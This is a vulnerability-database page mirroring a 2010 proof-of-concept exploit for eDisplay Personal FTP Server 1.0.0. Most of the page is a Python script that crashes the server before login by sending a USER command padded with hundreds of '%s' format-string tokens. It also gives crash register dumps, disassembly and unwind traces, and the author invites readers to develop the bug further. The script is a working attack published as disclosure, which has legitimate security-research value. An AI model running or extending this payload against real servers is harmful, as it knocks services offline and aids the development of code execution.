Lucene search
K

eDisplay Personal FTP Server 1.0.0 Pre-Authentication Crash

🗓️ 20 Mar 2010 00:00:00Reported by loneferretType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

eDisplay Personal FTP Server 1.0.0 Pre-Authentication Crash (PoC

Code
`  
  
# Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication Crash (PoC)  
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)  
# Found by: loneferret  
# Hat's off to dookie2000ca  
# Disvovery date: 16/03/2010  
# Software link: http://edisplay-personal-ftp-server.software.informer.com/  
# Tested on: Windows XP SP3 Professional  
# Nod to the Exploit-DB Team  
  
# Vendor informed via email : 17/03/2010  
  
#!/usr/bin/python  
  
#Pre-Authentication crash #1  
#I say crash number 1 since there's another instance where it crashes with the USER command.  
#Also many post-authentication commands also crash with the same buffer type (%n for example)  
#with variant degrees of interesting CPU registry overwrites.  
#It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent.  
#As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it.  
  
#CONTEXT DUMP  
# EIP: 7e4287aa mov dl,[eax]  
# EAX: 73736150 (1936941392) -> N/A  
# EBX: 0000000a ( 10) -> N/A  
# ECX: 73736150 (1936941392) -> N/A  
# EDX: 00000000 ( 0) -> N/A  
# EDI: 0012c9a6 ( 1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)  
# ESI: 73736151 (1936941393) -> N/A  
# EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source,   
# and whether this process is started automatically   
# or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)  
# ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack)  
# +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap)  
# +04: 77124880 (1997686912) -> N/A  
# +08: 000000cd ( 205) -> N/A  
# +0c: 00000000 ( 0) -> N/A  
# +10: ffffffff (4294967295) -> N/A  
# +14: 00000000 ( 0) -> N/A  
  
#disasm around:  
# 0x7e428794 push eax  
# 0x7e428795 push byte 0x0  
# 0x7e428797 push esi  
# 0x7e428798 lea eax,[ebp+0x8]  
# 0x7e42879b push eax  
# 0x7e42879c call [0x7e4114b8]  
# 0x7e4287a2 jmp 0x7e428747  
# 0x7e4287a4 test eax,eax  
# 0x7e4287a6 jz 0x7e42875e  
# 0x7e4287a8 jmp 0x7e428747  
# 0x7e4287aa mov dl,[eax]  
# 0x7e4287ac inc eax  
# 0x7e4287ad test dl,dl  
# 0x7e4287af jnz 0x7e4287aa  
# 0x7e4287b1 sub eax,esi  
# 0x7e4287b3 xor esi,esi  
# 0x7e4287b5 xor edx,edx  
# 0x7e4287b7 cmp [ebp-0x28],edx  
# 0x7e4287ba jnl 0x7e443411  
# 0x7e4287c0 sub [ebp-0x18],eax  
# 0x7e4287c3 cmp esi,edx  
  
#stack unwind:  
# FtpServX.dll:50e0989b  
# FtpServX.dll:50e0a6d8  
# FtpServX.dll:50e09d91  
# USER32.dll:7e418734  
# USER32.dll:7e418816  
# USER32.dll:7e4189cd  
# USER32.dll:7e4196c7  
# MSVBVM60.DLL:7342a6b0  
# MSVBVM60.DLL:7342a627  
# MSVBVM60.DLL:7342a505  
  
#SEH unwind:  
# 0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8  
# 0012fe58 -> USER32.dll:7e44048f push ebp  
# 0012ffa8 -> USER32.dll:7e44048f push ebp  
# 0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp  
# ffffffff -> kernel32.dll:7c839ac0 push ebp  
  
  
import socket  
  
buffer = ("%s") * 810 # \x25\x73  
  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
connect=s.connect(('xxx.xxx.xxx.xxx',21))  
s.recv(1024)  
s.send('USER '+buffer+'\r\n')  
s.recv(1024)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Mar 2010 00:00Current
7.4High risk
Vulners AI Score7.4
23